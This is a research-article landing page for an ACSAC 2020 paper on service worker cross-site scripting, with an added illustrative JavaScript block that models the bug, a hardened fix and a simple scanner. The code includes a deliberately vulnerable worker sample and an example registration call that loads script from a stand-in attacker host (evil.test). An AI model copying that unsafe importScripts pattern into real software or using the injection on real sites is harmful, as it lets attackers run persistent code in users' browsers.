DOI: 10.1145/3427228.3427290
Research article, Public Access

Security Study of Service Worker Cross-Site Scripting

Published: 08 December 2020

Abstract

Modern websites use service workers to provide app-like functionality such as offline mode and push notifications. To support these features, a service worker is granted special privileges, including the ability to intercept and manipulate HTTP traffic, which is why the service worker API was designed with security as a priority. However, we find that many websites follow a questionable practice that can jeopardize the security of their service worker.
In this work, we demonstrate how this practice can result in a cross-site scripting (XSS) attack inside a service worker, allowing an attacker to obtain and leverage the service worker's privileges. Because these privileges are unique to service workers, such attacks can have more severe consequences than a typical XSS attack. We term this type of vulnerability Service Worker based Cross-Site Scripting (SW-XSS). To assess its real-world security impact, we develop a tool called SW-Scanner and use it to analyze top websites in the wild. Our findings reveal a worrisome trend: in total, we find 40 websites vulnerable to this attack, including several popular and high-ranking websites. Finally, we discuss potential defense solutions to mitigate SW-XSS.
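The abstract does not name the questionable practice, so the following added example (not code from the paper or its SW-Scanner tool) assumes one plausible shape of it: a service worker that chooses which helper script to importScripts() from a query parameter in its own registration URL (self.location). The origin example.test, the lib parameter, the ALLOWED_LIBS table, the two constructed worker sources and every function name are assumptions made for this illustration. It shows the default scope rule that makes worker-level script execution cover every page under the worker's directory, the unsafe import resolution beside a hardened one, and a crude source check for the pattern.

```javascript
// Added, illustrative model of SW-XSS (not code from the paper or SW-Scanner).
// Assumed pattern: a service worker picks a script to importScripts() based
// on a query parameter ("lib") in its own registration URL (self.location).
// example.test, ALLOWED_LIBS, the "lib" parameter and the sample sources
// below are assumptions made for this example.

// Default scope of a service worker is the directory of its script. Every
// navigation and fetch() under this prefix passes through the worker, which
// is what makes script execution inside it more powerful than page-level XSS.
function defaultScope(swScriptUrl) {
  const u = new URL(swScriptUrl);
  return u.origin + u.pathname.slice(0, u.pathname.lastIndexOf("/") + 1);
}

function inScope(swScriptUrl, requestUrl) {
  return new URL(requestUrl).href.startsWith(defaultScope(swScriptUrl));
}

// UNSAFE: whatever the registration URL carried is resolved and imported as
// code. An attacker who controls the registration call (for instance through
// a page-level XSS) turns a one-off injection into persistent code inside
// the worker:  navigator.serviceWorker.register("/sw.js?lib=//evil.test/x.js")
function unsafeImportTarget(swLocation) {
  const lib = new URL(swLocation).searchParams.get("lib");
  return lib === null ? null : new URL(lib, swLocation).href;
}

// HARDENED: the parameter is only a key into a fixed table of same-origin
// paths, and the resolved URL is re-checked against the worker's origin.
const ALLOWED_LIBS = Object.freeze({
  analytics: "/static/sw-analytics.js",
  push: "/static/sw-push.js",
});

function safeImportTarget(swLocation) {
  const base = new URL(swLocation);
  const key = base.searchParams.get("lib");
  if (key === null) return null;
  if (!Object.prototype.hasOwnProperty.call(ALLOWED_LIBS, key)) {
    throw new Error(`refusing to import unknown lib "${key}"`);
  }
  const target = new URL(ALLOWED_LIBS[key], base);
  if (target.origin !== base.origin) {
    throw new Error("refusing cross-origin importScripts");
  }
  return target.href;
}

// Crude static check over service worker source, in the spirit of a scanner
// for this bug class: flag importScripts() calls whose arguments are not all
// plain string literals, and any read of the worker's own location. It is
// regex-based, so nested parentheses or comments can confuse it; it errs on
// the side of flagging.
function scanServiceWorkerSource(src) {
  const findings = [];
  const importRe = /importScripts\s*\(([^)]*)\)/g;
  const literal = /^(["'])[^"'\\]*\1$/;
  let m;
  while ((m = importRe.exec(src)) !== null) {
    const args = m[1].split(",").map((a) => a.trim()).filter(Boolean);
    if (!args.every((a) => literal.test(a))) {
      findings.push({ rule: "dynamic-importScripts", snippet: m[0] });
    }
  }
  if (/\bself\.location\b|\blocation\.(search|href)\b/.test(src)) {
    findings.push({ rule: "location-derived-input" });
  }
  return findings;
}

// Constructed sample worker sources (not taken from any real site).
const VULNERABLE_SW = `
self.addEventListener("install", () => {
  const lib = new URL(self.location).searchParams.get("lib");
  importScripts(lib);
});
`;
const SAFE_SW = `
importScripts("/static/sw-analytics.js", "/static/sw-push.js");
`;

console.log(unsafeImportTarget("https://example.test/sw.js?lib=//evil.test/x.js"));
console.log(safeImportTarget("https://example.test/sw.js?lib=analytics"));
console.log(scanServiceWorkerSource(VULNERABLE_SW).map((f) => f.rule));
```

The hardened resolver deliberately refuses unknown keys instead of falling back to a default, since a silent fallback would hide the very registration parameters a defender wants to see in logs.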



Published In

ACSAC '20: Proceedings of the 36th Annual Computer Security Applications Conference
December 2020, 962 pages
ISBN: 9781450388580
DOI: 10.1145/3427228
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected].

Publisher

Association for Computing Machinery, New York, NY, United States



Author Tags

  1. Cross-Site Scripting
  2. Service Worker

Qualifiers

  • Research-article
  • Research
  • Refereed limited

Conference

ACSAC '20

Acceptance Rates

Overall Acceptance Rate 104 of 497 submissions, 21%

Article Metrics

  • Downloads (Last 12 months)1,003
  • Downloads (Last 6 weeks)158
Reflects downloads up to 03 Mar 2025

Cited By

  • (2023) A Honey postMessage, but a Heart of Gall: Exploiting Push Service in Service Workers Via postMessage. Proceedings of the 2023 ACM Asia Conference on Computer and Communications Security, 785-796. DOI: 10.1145/3579856.3590342. Published 10 Jul 2023.
  • (2023) Progressive Web Apps to Support (Critical) Systems in Low or No Connectivity Areas. 2023 IEEE IAS Global Conference on Emerging Technologies (GlobConET), 1-6. DOI: 10.1109/GlobConET56651.2023.10150058. Published 19 May 2023.
  • (2023) Web accessibility evaluation of private and government websites for people with disabilities through fuzzy classifier in the USA. Soft Computing. DOI: 10.1007/s00500-023-08740-6. Published 13 Jul 2023.
  • (2023) Caching Data in a Web Audio Service Using Progressive Web Apps Technologies. Cyber-Physical Systems and Control II, 372-380. DOI: 10.1007/978-3-031-20875-1_34. Published 21 Jan 2023.
  • (2022) Evaluating Progressive Web App Accessibility for People with Disabilities. Network 2(2), 350-369. DOI: 10.3390/network2020022. Published 8 Jun 2022.
  • (2022) InviCloak. Proceedings of the 2022 ACM SIGSAC Conference on Computer and Communications Security, 1947-1961. DOI: 10.1145/3548606.3559336. Published 7 Nov 2022.
  • (2022) A Survey on Vulnerabilities of Service Workers. 2022 13th International Conference on Information and Communication Technology Convergence (ICTC), 2080-2082. DOI: 10.1109/ICTC55196.2022.9952818. Published 19 Oct 2022.
  • (2022) SoK: Workerounds - Categorizing Service Worker Attacks and Mitigations. 2022 IEEE 7th European Symposium on Security and Privacy (EuroS&P), 555-571. DOI: 10.1109/EuroSP53844.2022.00041. Published Jun 2022.
  • (2022) Measuring the (Over)use of Service Workers for In-Page Push Advertising Purposes. Passive and Active Measurement, 426-438. DOI: 10.1007/978-3-030-98785-5_19. Published 28 Mar 2022.
  • (2021) The Service Worker Hiding in Your Browser: The Next Web Attack Target? Proceedings of the 24th International Symposium on Research in Attacks, Intrusions and Defenses, 312-323. DOI: 10.1145/3471621.3471845. Published 6 Oct 2021.
